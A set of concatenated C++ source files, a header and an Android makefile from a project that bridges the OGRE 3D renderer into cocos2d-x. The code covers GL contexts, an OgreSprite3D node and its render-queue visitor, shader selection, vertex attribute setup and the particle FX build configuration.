mScriptHelper->excuteScript(Value(time));
}
}
ScheduleAction* ScheduleAction::reverse() const
{
return ScheduleAction::create(_duration,mScriptHelper);
}
ScheduleAction::ScheduleAction()
:mScriptHelper(nullptr)
{}
ScheduleAction::~ScheduleAction()
{
CC_SAFE_RELEASE_NULL(mScriptHelper);
}
NS_CC_END<file_sep>/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2012 Tor<NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-----------------------------------------------------------------------------
*/
#include "OgreCommonGLContext.h"
namespace Ogre {
CommonGLContext::CommonGLContext(const CommonGLSupport *glsupport, int handle)
:mGLSupport(glsupport), mHandle(handle), mDelegate(0)
{
}
CommonGLContext::~CommonGLContext()
{
}
void CommonGLContext::setCurrent()
{
if(mDelegate)
mDelegate->setCurrent(mHandle);
}
void CommonGLContext::endCurrent()
{
if(mDelegate)
mDelegate->endCurrent(mHandle);
}
GLES2Context* CommonGLContext::clone() const
{
return new CommonGLContext(mGLSupport, mHandle);
}
void CommonGLContext::setDelegate(CommonGLContextDelegate *delegate)
{
mDelegate = delegate;
}
CommonGLContextDelegate *CommonGLContext::getDelegate()
{
return mDelegate;
}
int CommonGLContext::getHandle() const
{
return mHandle;
}
}
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "OgreOgreSprite3D.h"
#include <Ogre.h>
#include "OgreOgreManager.h"
#include "OgreNodeProtocol.h"
#include <OgreTechnique.h>
#include <OgreMovableObject.h>
#include <OgreMaterialManager.h>
#include <OgreEntity.h>
#include "components\OgreBridgeBufferManager.h"
#include "components\OgreBridgeTextureManager.h"
#include "OgreOgreManager.h"
#include "OgreSceneNode.h"
USING_NS_CC;
static const char* SHADER_OGRE_POSITION_TEXTURE = "SHADER_OGRE_POSITION_TEXTURE";
static const char* SHADER_OGRE_POSITION_TEXTURE_COLOR = "SHADER_OGRE_POSITION_TEXTURE_COLOR";
namespace Ogre
{
static void covertInverse(cocos2d::Mat4 &dst,Ogre::Matrix4 &src)
{
dst.m[0] = src[0][0];dst.m[1] = src[1][0];dst.m[2] = src[2][0];dst.m[3] = src[3][0];
dst.m[4] = src[0][1];dst.m[5] = src[1][1];dst.m[6] = src[2][1];dst.m[7] = src[3][1];
dst.m[8] = src[0][2];dst.m[9] = src[1][2];dst.m[10] = src[2][2];dst.m[11] = src[3][2];
dst.m[12] = src[0][3];dst.m[13] = src[1][3];dst.m[14] = src[2][3];dst.m[15] = src[3][3];
}
static cocos2d::GLProgramState *getOrCreateWithGLProgramName(const std::string &name)
{
cocos2d::GLProgram *glProgram = cocos2d::GLProgramCache::getInstance()->getProgram(name);
if (!glProgram)
{
if (name == SHADER_OGRE_POSITION_TEXTURE )
{
glProgram = GLProgram::createWithFilenames("shader/ccShader_PositionTex.vert","shader/ccShader_PositionTex.frag");
cocos2d::GLProgramCache::getInstance()->addGLProgram(glProgram,SHADER_OGRE_POSITION_TEXTURE);
}
else if(name == SHADER_OGRE_POSITION_TEXTURE_COLOR )
{
glProgram = GLProgram::createWithFilenames("shader/ccShader_PositionTexColor.vert","shader/ccShader_PositionTexColor.frag");
cocos2d::GLProgramCache::getInstance()->addGLProgram(glProgram,SHADER_OGRE_POSITION_TEXTURE_COLOR);
}
}
return cocos2d::GLProgramState::getOrCreateWithGLProgram(glProgram);
}
enum {
OGRE_VERTEX_ATTRIB_FLAG_NONE = 0,
OGRE_VERTEX_ATTRIB_FLAG_POSITION = 1 << 0,
OGRE_VERTEX_ATTRIB_FLAG_COLOR = 1 << 1,
OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD = 1 << 2,
OGRE_VERTEX_ATTRIB_FLAG_NORMAL = 1 << 3,
OGRE_VERTEX_ATTRIB_FLAG_BLEND_WEIGHT = 1 << 4,
OGRE_VERTEX_ATTRIB_FLAG_BLEND_INDEX = 1 << 5,
OGRE_UNIFORM_FLAG_COLOR = 1 << 6,
OGRE_PROGRAM_FLAG_POS_TEX = (OGRE_VERTEX_ATTRIB_FLAG_POSITION | OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD),
OGRE_PROGRAM_FLAG_POS_TEX_NORMAL = (OGRE_VERTEX_ATTRIB_FLAG_POSITION | OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD | OGRE_VERTEX_ATTRIB_FLAG_NORMAL),
OGRE_PROGRAM_FLAG_POS_COLOR_TEX = (OGRE_VERTEX_ATTRIB_FLAG_POSITION | OGRE_VERTEX_ATTRIB_FLAG_COLOR | OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD),
OGRE_PROGRAM_FLAG_POS_COLOR_TEX_NORMAL = (OGRE_VERTEX_ATTRIB_FLAG_POSITION | OGRE_VERTEX_ATTRIB_FLAG_COLOR | OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD | OGRE_VERTEX_ATTRIB_FLAG_NORMAL),
};
static cocos2d::GLProgramState * getOrCreateWithVertexFlag(const int &flag)
{
cocos2d::GLProgramState *glState;
switch(flag)
{
case OGRE_PROGRAM_FLAG_POS_TEX:
case OGRE_PROGRAM_FLAG_POS_TEX_NORMAL:
glState = getOrCreateWithGLProgramName(SHADER_OGRE_POSITION_TEXTURE);
break;
case OGRE_PROGRAM_FLAG_POS_COLOR_TEX:
case OGRE_PROGRAM_FLAG_POS_COLOR_TEX_NORMAL:
default:
glState = getOrCreateWithGLProgramName(SHADER_OGRE_POSITION_TEXTURE_COLOR);
break;
}
return glState;
}
const int & getVertexAttribFlagBySemantic(VertexElementSemantic semantic)
{
switch(semantic)
{
case VES_POSITION:
return OGRE_VERTEX_ATTRIB_FLAG_POSITION;
break;
case VES_DIFFUSE:
return OGRE_VERTEX_ATTRIB_FLAG_COLOR;
break;
case VES_TEXTURE_COORDINATES:
return OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD;
break;
case VES_NORMAL:
return OGRE_VERTEX_ATTRIB_FLAG_NORMAL;
break;
case VES_BLEND_WEIGHTS:
return OGRE_VERTEX_ATTRIB_FLAG_BLEND_WEIGHT;
break;
case VES_BLEND_INDICES:
return OGRE_VERTEX_ATTRIB_FLAG_BLEND_INDEX;
break;
default:
return OGRE_VERTEX_ATTRIB_FLAG_NONE;
break;
}
}
const char* getVertexAttribNameBySemantic(VertexElementSemantic semantic)
{
const char* attribute_name;
switch(semantic)
{
case VES_POSITION:
attribute_name = GLProgram::ATTRIBUTE_NAME_POSITION;
break;
case VES_BLEND_WEIGHTS:
attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_WEIGHT;
break;
case VES_BLEND_INDICES:
attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_INDEX;
break;
case VES_NORMAL:
attribute_name = GLProgram::ATTRIBUTE_NAME_NORMAL;
break;
case VES_DIFFUSE:
attribute_name = GLProgram::ATTRIBUTE_NAME_COLOR;
break;
case VES_TEXTURE_COORDINATES:
attribute_name = GLProgram::ATTRIBUTE_NAME_TEX_COORD;
break;
//case VES_SPECULAR:VES_BINORMAL:VES_TANGENT:
// break;
}
return attribute_name;
}
void refreshVertexAttribTypeByType(VertexElementType elementType,GLint &size, GLenum &type,GLboolean &normalized)
{
switch(elementType)
{
case VET_FLOAT1:
type = GL_FLOAT;
size = 1;
normalized = GL_FALSE;
break;
case VET_FLOAT2:
type = GL_FLOAT;
size = 2;
normalized = GL_FALSE;
break;
case VET_FLOAT3:
type = GL_FLOAT;
size = 3;
normalized = GL_FALSE;
break;
case VET_FLOAT4:
type = GL_FLOAT;
size = 4;
normalized = GL_FALSE;
break;
case VET_SHORT1:
type = GL_SHORT;
size = 1;
normalized = GL_FALSE;
break;
case VET_SHORT2:
type = GL_SHORT;
size = 2;
normalized = GL_FALSE;
break;
case VET_SHORT3:
type = GL_SHORT;
size = 3;
normalized = GL_FALSE;
break;
case VET_SHORT4:
type = GL_SHORT;
size = 4;
normalized = GL_FALSE;
break;
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
case VET_UBYTE4:
size = 4;
normalized = GL_TRUE;
type = GL_UNSIGNED_BYTE;
break;
default:
break;
};
}
class QueueVisitor : public RenderQueue
{
public:
virtual ~QueueVisitor(){};
QueueVisitor(){}
void setSceneManager(Ogre::SceneManager *manager)
{
mSceneManager = manager;
}
void setRenderSystem(Ogre::RenderSystem *system)
{
mRenderSystem = system;
}
void _visitor(Ogre::SceneNode *node)
{
SceneNode::ObjectIterator objs = node->getAttachedObjectIterator();
while (objs.hasMoreElements())
{
MovableObject* mobj = objs.getNext();
if(mobj && mobj->getVisible())
{
mobj->_notifyCurrentCamera( OgreManager::getInstance()->getCamera());
mobj->_updateRenderQueue(this);
}
}
SceneNode::ChildNodeIterator children = node->getChildIterator();
while (children.hasMoreElements())
{
this->_visitor(static_cast<SceneNode*>(children.getNext()));
}
}
void visitor(Ogre::SceneNode *protocol,MeshStateMap *stateMap)
{
_tempStateMap = stateMap;
protocol->_update(true,true);
_visitor(protocol);
_tempStateMap = NULL;
}
virtual void addRenderable(Renderable* pRend, uint8 groupID, ushort priority)
{
Technique* pTech;
// tell material it's been used
if (!pRend->getMaterial().isNull())
pRend->getMaterial()->touch();
// Check material & technique supplied (the former since the default implementation
// of getTechnique is based on it for backwards compatibility
if(pRend->getMaterial().isNull() || !pRend->getTechnique())
{
// Use default base white
MaterialPtr baseWhite = MaterialManager::getSingleton().getByName("BaseWhite");
pTech = baseWhite->getTechnique(0);
}
else
pTech = pRend->getTechnique();
if (mRenderableListener)
{
// Allow listener to override technique and to abort
if (!mRenderableListener->renderableQueued(pRend, groupID, priority,
&pTech, this))
return; // rejected
// tell material it's been used (incase changed)
pTech->getParent()->touch();
}
bool isTransparent = false;
if (pTech->isTransparentSortingForced() ||
(pTech->isTransparent() &&
(!pTech->isDepthWriteEnabled() ||
!pTech->isDepthCheckEnabled() ||
pTech->hasColourWriteDisabled())))
{
if (pTech->isTransparentSortingEnabled())
isTransparent = true;
}
Technique::PassIterator pi = pTech->getPassIterator();
while (pi.hasMoreElements())
{
const Pass * pass = pi.getNext();
if (pRend->preRender(mSceneManager,mRenderSystem))
{
_render(pRend, pass, isTransparent);
}
pRend->postRender(mSceneManager,mRenderSystem);
}
}
void _render(Renderable *rend,const Pass *pass,bool isTransport)
{
MeshStateMap::iterator stateItor = _tempStateMap->find(rend);
RenderState *renderState;
HardwareBuffer *hardwareBuffer;
rend->getRenderOperation(mOperation);
if(stateItor != _tempStateMap->end())
{
renderState = &stateItor->second;
_refreshVertexAttribPointer(mOperation,&renderState->glProgramState,&hardwareBuffer);
}
else
{
(*_tempStateMap)[rend] = RenderState();
stateItor = _tempStateMap->find(rend);
renderState = &stateItor->second;
_formatVertexBuffer(mOperation,&renderState->glProgramState,&hardwareBuffer);
}
renderState->vertexBufferId = static_cast<const BridgeHardwareVertexBuffer*>(hardwareBuffer)->getGLBufferId();
renderState->blend.src = pass->getSourceBlendFactor();
renderState->blend.dst = pass->getDestBlendFactor();
int matCount = rend->getNumWorldTransforms();
if(matCount > 0)
{
rend->getWorldTransforms(mMatrix4);
for(int i= 0 ;i < matCount; i++)
{
covertInverse(renderState->mat4,mMatrix4[i]);
}
}
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
pTex->_prepare();
//if (pTex->hasViewRelativeTextureCoordinateGeneration())
//{
// mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
//}
//++unit;
BridgeTexturePtr textP = BridgeTexturePtr(pTex->_getTexturePtr());
if(!textP.isNull())
{
renderState->textureId = textP->getGLID();
}
}
if (mOperation.useIndexes)
{
renderState->_visible = true;
renderState->indexBufferId = static_cast<BridgeHardwareIndexBuffer*>(mOperation.indexData->indexBuffer.get())->getGLBufferId();
renderState->indexBufferType = mOperation.indexData->indexBuffer->getType();
renderState->operationType = mOperation.operationType;
renderState->indexCount = mOperation.indexData->indexCount;
renderState->isTransparent = isTransport;
renderState->isDepthTestEnabled = pass->getDepthCheckEnabled();
renderState->isDepthWriteEnabled = pass->getDepthWriteEnabled();
}
}
void _refreshVertexAttribPointer(RenderOperation &ro,cocos2d::GLProgramState **glProgramState,HardwareBuffer **vertextBuffer)
{
*vertextBuffer = nullptr;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem,elemEnd = decl.end();
HardwareVertexBufferSharedPtr vertexBufferPtr;
GLint size;
GLenum type;
GLboolean normalized;
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
{
vertexBufferPtr = ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
if(nullptr != *vertextBuffer && *vertextBuffer != vertexBufferPtr.get())
cocos2d::log("ERROR: OgreOgreSprite3D cannot multiple vertexBuffer!");
else
*vertextBuffer = vertexBufferPtr.get();
refreshVertexAttribTypeByType(elem->getType(),size,type,normalized);
GLsizei stride = static_cast<GLsizei>(vertexBufferPtr->getVertexSize());
(*glProgramState)->setVertexAttribPointer(getVertexAttribNameBySemantic(elem->getSemantic()),
size,
type,
normalized,
stride,
(GLvoid*)((char *)NULL + (elem->getOffset()))
);
}
}
}
void _formatVertexBuffer(RenderOperation &ro,cocos2d::GLProgramState **glProgramState,HardwareBuffer **vertextBuffer)
{
*vertextBuffer = nullptr;
*glProgramState = nullptr;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem,elemEnd = decl.end();
int flag = OGRE_VERTEX_ATTRIB_FLAG_NONE;
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
{
flag = flag | getVertexAttribFlagBySemantic(elem->getSemantic());
}
}
*glProgramState = getOrCreateWithVertexFlag(flag);
_refreshVertexAttribPointer(ro,glProgramState,vertextBuffer);
}
protected:
Ogre::Matrix4 mMatrix4[256];
Ogre::RenderOperation mOperation;
MeshStateMap *_tempStateMap;
Ogre::SceneManager *mSceneManager;
Ogre::RenderSystem *mRenderSystem;
};
}
static Ogre::QueueVisitor *s_QueueVisitor = NULL;
NS_CC_BEGIN
GLuint vertexBuffer;
GLuint indexBuffer;
typedef struct {
GLfloat cPosition[3];
GLfloat cColor[4];
GLfloat cTexCoord[2];
} Vertex;
OgreSprite3D* OgreSprite3D::create()
{
auto node = new OgreSprite3D();
if (node && node->init())
{
node->autorelease();
return node;
}
CC_SAFE_DELETE(node);
return nullptr;
}
OgreSprite3D* OgreSprite3D::create(const std::string &filePath)
{
auto node = new OgreSprite3D();
if (node && node->initWithFile(filePath))
{
node->autorelease();
return node;
}
CC_SAFE_DELETE(node);
return nullptr;
}
OgreSprite3D::OgreSprite3D() :
_blend(cocos2d::BlendFunc::ALPHA_NON_PREMULTIPLIED)
{
_nodeProtocol = OgreManager::getInstance()->getSceneManager()->createSceneNode();
}
OgreSprite3D::~OgreSprite3D()
{
CC_SAFE_DELETE(_nodeProtocol);
}
bool OgreSprite3D::init()
{
if(NULL == s_QueueVisitor) //cannot crate this object before root
{
s_QueueVisitor = new Ogre::QueueVisitor();
s_QueueVisitor->setSceneManager(OgreManager::getInstance()->getSceneManager());
s_QueueVisitor->setRenderSystem(OgreManager::getInstance()->getRenderSystem());
}
/*_texture = Director::getInstance()->getTextureCache()->addImage("HelloWorld.png");
Size visibleSize = Director::getInstance()->getVisibleSize() * 0.3;
Vec2 origin = Director::getInstance()->getVisibleOrigin() * 0.3;
/////////////////////////////
this->setGLProgram(GLProgramCache::getInstance()->getGLProgram(GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR));
_texture = Director::getInstance()->getTextureCache()->addImage("HelloWorld.png");
Vertex data[] =
{
{ { origin.x, origin.y, 0 }, { 1, 1, 1, 1 }, { 0, 1 } },
{ { visibleSize.width , origin.y, 0 }, { 1, 1, 1, 1 }, { 1, 1 } },
{ { origin.x, visibleSize.height, 0 }, { 1, 1, 1, 1 }, { 0, 0 } },
{ { visibleSize.height, visibleSize.width, 0 }, { 1, 1, 1, 1 }, { 1, 0 } }
};
glGenBuffers(1, &vertexBuffer);
glBindBuffer(GL_ARRAY_BUFFER, vertexBuffer);
glBufferData(GL_ARRAY_BUFFER, sizeof(data), data, GL_STATIC_DRAW);
GLubyte Indices[] = { 0, 1, 2, 2, 3, 1 };
glGenBuffers(1, &indexBuffer);
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, indexBuffer);
glBufferData(GL_ELEMENT_ARRAY_BUFFER, sizeof(Indices), Indices, GL_STATIC_DRAW);
glBindBuffer(GL_ARRAY_BUFFER, 0);
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0);*/
return CCNode::init();
}
bool OgreSprite3D::initWithFile( const std::string &filePath)
{
auto entry = OgreManager::getInstance()->createEntity(filePath);
if (entry && OgreSprite3D::init())
{
this->attachObject(entry);
return true;
}
return false;
}
void OgreSprite3D::attachObject(Ogre::MovableObject *movable)
{
if (_nodeProtocol)
_nodeProtocol->attachObject(movable);
}
void OgreSprite3D::detachObject(Ogre::MovableObject *movable)
{
if (_nodeProtocol)
_nodeProtocol->detachObject(movable);
}
void OgreSprite3D::detachAllObjects()
{
if (_nodeProtocol)
_nodeProtocol->detachAllObjects();
}
void OgreSprite3D::updateParentTransform(const Mat4& parentTransform)
{
_modelViewTransform = this->transform(parentTransform);
if (_nodeProtocol)
{
_modelViewTransform.decompose(&mCosScale, &mCosRotation, &mCosTranslation);
_nodeProtocol->setScale(Ogre::Vector3(mCosScale.x,mCosScale.y,mCosScale.z));
_nodeProtocol->setPosition(Ogre::Vector3(mCosTranslation.x,mCosTranslation.y,mCosTranslation.z));
_nodeProtocol->setOrientation(Ogre::Quaternion(mCosRotation.w,mCosRotation.x,mCosRotation.y,mCosRotation.z));
_nodeProtocol->needUpdate();
}
}
uint32_t OgreSprite3D::processParentFlags(const Mat4& parentTransform, uint32_t parentFlags)
{
if (_usingNormalizedPosition) {
CCASSERT(_parent, "setNormalizedPosition() doesn't work with orphan nodes");
if ((parentFlags & FLAGS_CONTENT_SIZE_DIRTY) || _normalizedPositionDirty) {
auto s = _parent->getContentSize();
_position.x = _normalizedPosition.x * s.width;
_position.y = _normalizedPosition.y * s.height;
_transformUpdated = _transformDirty = _inverseDirty = true;
_normalizedPositionDirty = false;
}
}
uint32_t flags = parentFlags;
flags |= (_transformUpdated ? FLAGS_TRANSFORM_DIRTY : 0);
flags |= (_contentSizeDirty ? FLAGS_CONTENT_SIZE_DIRTY : 0);
if (flags & FLAGS_DIRTY_MASK)
updateParentTransform(parentTransform);
_transformUpdated = false;
_contentSizeDirty = false;
return flags;
}
void OgreSprite3D::visit(cocos2d::Renderer *renderer, const cocos2d::Mat4& parentTransform, uint32_t parentFlags)
{
// quick return if not visible. children won't be drawn.
if (!_visible)
{
return;
}
uint32_t flags = processParentFlags(parentTransform, parentFlags);
// IMPORTANT:
// To ease the migration to v3.0, we still support the Mat4 stack,
// but it is deprecated and your code should not rely on it
Director* director = Director::getInstance();
director->pushMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW);
director->loadMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW, _modelViewTransform);
bool visibleByCamera = isVisitableByVisitingCamera();
if (visibleByCamera)
{
this->draw(renderer, _modelViewTransform, flags);
}
director->popMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW);
// FIX ME: Why need to set _orderOfArrival to 0??
// Please refer to https://github.com/cocos2d/cocos2d-x/pull/6920
// reset for next frame
// _orderOfArrival = 0;
}
void OgreSprite3D::draw(cocos2d::Renderer *renderer, const cocos2d::Mat4 &transform, uint32_t flags)
{
if(_nodeProtocol)
{
//glClearColor(1.0f,1.0f,0.0f,1.0f);
s_QueueVisitor->visitor(_nodeProtocol,&_meshStateMap);
Color4F color(getDisplayedColor());
color.a = getDisplayedOpacity() / 255.0f;
/*_customCommand.init(_globalZOrder);
_customCommand.func = CC_CALLBACK_0(OgreSprite3D::onDraw, this, transform, flags);
renderer->addCommand(&_customCommand);
return ;*/
MeshStateMap::iterator elem ,end = _meshStateMap.end();
for( elem = _meshStateMap.begin(); elem != end; ++ elem)
{
Ogre::RenderState &state = elem->second;
if(state._visible)
{
state._visible = false;
MeshCommand &meshCommand = state.meshCommand;
//state.blend.src = GL_SRC_ALPHA;
//state.blend.dst.m = GL_ONE_MINUS_DST_ALPHA;
meshCommand.init(_globalZOrder,state.textureId,state.glProgramState,state.blend,state.vertexBufferId,state.indexBufferId,state.operationType,state.indexBufferType,state.indexCount,state.mat4);
//meshCommand.setDepthTestEnabled(true);
//meshCommand.setTransparent(true);
//meshCommand.setDepthWriteEnabled(false);
meshCommand.setTransparent(state.isTransparent);
meshCommand.setDepthTestEnabled(state.isDepthTestEnabled);
meshCommand.setDepthWriteEnabled(state.isDepthWriteEnabled);
meshCommand.setDisplayColorEnabled(false);
meshCommand.genMaterialID(state.textureId, state.glProgramState, state.vertexBufferId, state.indexBufferId, state.blend);
renderer->addCommand(&meshCommand);
}
}
}
}
//we call our actual opengl commands here
void OgreSprite3D::onDraw(const cocos2d::Mat4 &transform, uint32_t flags)
{
MeshStateMap::iterator elem ,end = _meshStateMap.end();
for( elem = _meshStateMap.begin(); elem != end; ++ elem)
{
Ogre::RenderState &state = elem->second;
auto s_shader = getGLProgram();
s_shader->use();
s_shader->setUniformsForBuiltins(transform);
GL::bindTexture2D(state.textureId);
glBindBuffer(GL_ARRAY_BUFFER,state.vertexBufferId);
state.glProgramState->applyAttributes();
/*glVertexAttribPointer(kCCVertexAttrib_Position, 3, GL_FLOAT, GL_FALSE, sizeof(Vertex),
(GLvoid*)offsetof(Vertex, cPosition));
glVertexAttribPointer(kCCVertexAttrib_TexCoords, 2, GL_FLOAT, GL_FALSE, sizeof(Vertex),
(GLvoid*)offsetof(Vertex, cTexCoord));
glVertexAttribPointer(kCCVertexAttrib_Color, 4, GL_FLOAT, GL_FALSE, sizeof(Vertex),
(GLvoid*)offsetof(Vertex, cColor));*/
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER,state.indexBufferId);
glDrawElements(state.operationType,state.indexCount,GL_UNSIGNED_BYTE, 0);
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0);
}
}
void OgreSprite3D::setBlendFunc(const cocos2d::BlendFunc &blendFunc)
{
if (_blend.src != blendFunc.src || _blend.dst != blendFunc.dst)
{
_blend = blendFunc;
}
}
const cocos2d::BlendFunc& OgreSprite3D::getBlendFunc() const
{
return _blend;
}
NS_CC_END<file_sep>LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE := particlefx_static
LOCAL_MODULE_FILENAME := libogreparticlefx
LOCAL_LDLIBS := -lGLESv2 \
-llog \
-lz \
-landroid
LOCAL_EXPORT_LDLIBS := -lGLESv2 \
-llog \
-lz \
-landroid
LOCAL_CFLAGS := -fexceptions -DUSE_FILE32API
LOCAL_CPPFLAGS := -fexceptions -Wno-deprecated-declarations
LOCAL_EXPORT_CFLAGS := -lstdc++ -fexceptions
LOCAL_EXPORT_CPPFLAGS := -lstdc++ -fexceptions
# ogre_particlefx
LOCAL_OGRE_PARTICLE_FX_INCLUDE := \
$(LOCAL_PATH)/include
LOCAL_OGRE_PARTICLE_FX_SRC_FILES := \
src/OgreAreaEmitter.cpp \
src/OgreBoxEmitter.cpp \
src/OgreColourFaderAffector2.cpp \
src/OgreColourFaderAffector.cpp \
src/OgreColourImageAffector.cpp \
src/OgreColourInterpolatorAffector.cpp \
src/OgreCylinderEmitter.cpp \
src/OgreDeflectorPlaneAffector.cpp \
src/OgreDirectionRandomiserAffector.cpp \
src/OgreEllipsoidEmitter.cpp \
src/OgreHollowEllipsoidEmitter.cpp \
src/OgreLinearForceAffector.cpp \
src/OgreParticleFX.cpp \
src/OgreParticleFXPlugin.cpp \
src/OgrePointEmitter.cpp \
src/OgreRingEmitter.cpp \
src/OgreRotationAffector.cpp \
src/OgreScaleAffector.cpp
LOCAL_EXPORT_C_INCLUDES := \
$(LOCAL_PATH)/../../../cocos \
$(LOCAL_PATH)/../../../cocos/platform/android \
$(LOCAL_PATH)/../../../external/freetype2/include/android \
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES := $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES += $(LOCAL_OGRE_PARTICLE_FX_INCLUDE)
LOCAL_SRC_FILES := \
LOCAL_SRC_FILES += $(LOCAL_OGRE_PARTICLE_FX_SRC_FILES)
LOCAL_WHOLE_STATIC_LIBRARIES := ogremain_static
include $(BUILD_STATIC_LIBRARY)
$(call import-module,../third_party/ogre/ogre_main)<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __CCOgreSprite3D_H__
#define __CCOgreSprite3D_H__
#include "cocos2d.h"
#include "OgreNodeProtocol.h"
namespace Ogre
{
class SceneNode;
class MovableObject;
}
NS_CC_BEGIN
class NodeProtocol;
/** particle univeise system */
class OgreSprite3D :
public cocos2d::Node,
public cocos2d::BlendProtocol
{
public:
static OgreSprite3D* create();
static OgreSprite3D* create(const std::string &filePath);
virtual void setBlendFunc(const cocos2d::BlendFunc &blendFunc) override;
virtual const cocos2d::BlendFunc &getBlendFunc() const override;
CC_CONSTRUCTOR_ACCESS:
OgreSprite3D();
virtual ~OgreSprite3D();
virtual bool init();
virtual bool initWithFile( const std::string &filePath);
virtual void detachAllObjects();
virtual void detachObject(Ogre::MovableObject *movable);
virtual void attachObject(Ogre::MovableObject *movable);
virtual void updateParentTransform(const Mat4& parentTransform);
uint32_t processParentFlags(const Mat4& parentTransform, uint32_t parentFlags);
virtual void visit(cocos2d::Renderer *renderer, const cocos2d::Mat4& parentTransform, uint32_t parentFlags) override;
virtual void draw(cocos2d::Renderer *renderer, const cocos2d::Mat4 &transform, uint32_t flags) override;
void onDraw(const cocos2d::Mat4 &transform, uint32_t flags);
protected:
cocos2d::BlendFunc _blend;
MeshStateMap _meshStateMap;
Ogre::SceneNode *_nodeProtocol;
cocos2d::Quaternion mCosRotation;
cocos2d::Vec3 mCosScale, mCosTranslation;
cocos2d::CustomCommand _customCommand;
cocos2d::Texture2D *_texture;
};
NS_CC_END
#endif // __ParticleSprite3D_H_
<file_sep>
#include "OgreStableHeaders.h"
